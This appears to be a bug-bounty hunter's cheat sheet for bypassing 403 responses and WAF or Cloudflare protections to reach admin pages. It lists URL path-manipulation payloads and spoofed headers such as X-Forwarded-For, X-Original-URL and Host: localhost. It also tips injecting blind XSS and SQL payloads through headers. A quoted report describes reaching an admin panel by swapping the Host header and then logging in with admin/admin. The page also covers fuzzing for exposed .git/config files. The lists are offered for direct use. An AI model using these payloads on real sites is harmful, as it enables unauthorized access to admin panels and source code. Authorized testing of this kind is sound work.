💯WAF or Cloudflare Bypass

-------------------------------------------------------------

Bypass 403 Error

-------------------------------------------------------------

Simple Ways to Bypass 403 and Access / Admin

  1. Using Space Symbols

website/admin%20

website/admin%09

website/%2e/path

website/admin/.

website//admin//

website/./admin/..

website/;/admin

website/.;/admin

website/./admin/./

website/admin/..;/

website/admin..;/

website//;//admin

-------------------------------------------------------------

  1. Using Traversal tricks:

/admin/..;/ /static../admin.json website/admin/api/..;/..;/admin/

-------------------------------------------------------------

  1. Using Via Header Bypass:

X-Forwarded-For: Put BXSS and SQLI Payloads

X-Custom-Ip-Authorization: 127.0.0.1

X-Original-URL: /admin

X-Rewrite-URL: /admin

X-Real-IP:127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1

X-Client-IP: 127.0.0.1

Content-Type: XML

Content-Type: application/XML

-------------------------------------------------------------

  1. Using Via HOST Header Bypass:

Host: google.com Host: localhost Host: 127.0.0.1 Host: 127.1

-------------------------------------------------------------

  1. Using Via Parameter Pulotion Bypass:

website/admin/panel ---> 403 website/admin/monitor ---> 200 Then website/admin/monitor/;panel ---> 200

-------------------------------------------------------------

  1. Try to Uppercase the alphabet in the URL bypass:

website/aDmIN

-------------------------------------------------------------

Unicode Text Converter

https://qaz.wtf/u/convert.cgi

-------------------------------------------------------------

-------------------------------------------------------------

403 Bypass

Steps to Reproduce (According to Report):

Navigate to “​https://redacted.com/admin" give (403 error). Then intercept that request with the help of Burp Suite. After intercepting that request simply change the host header value from redacted.com to​​ google.com & hit Go. You will find that the server does not validate that request properly. It simply opens up an admin panel login page. Now Error Changes into 403 Forbidden to 200 OK (Bypassing Done) But now I don’t have the right credentials to get access to the admin panel. Luckily I tried ‘admin’ as a username and ‘admin’ as a password. Got Success.

-------------------------------------------------------------

Mostly I try Fuzzing and 403 Bypasses

  • Fuzzing /.git/FUZZ (use custom .git wordlist)

  • 403 Bypass /.git => 403

  • /.git/config/ => 200

  • /.git/config/* => 200

PreviousCVE ExploitNextMy Synack Report Methodology

Last updated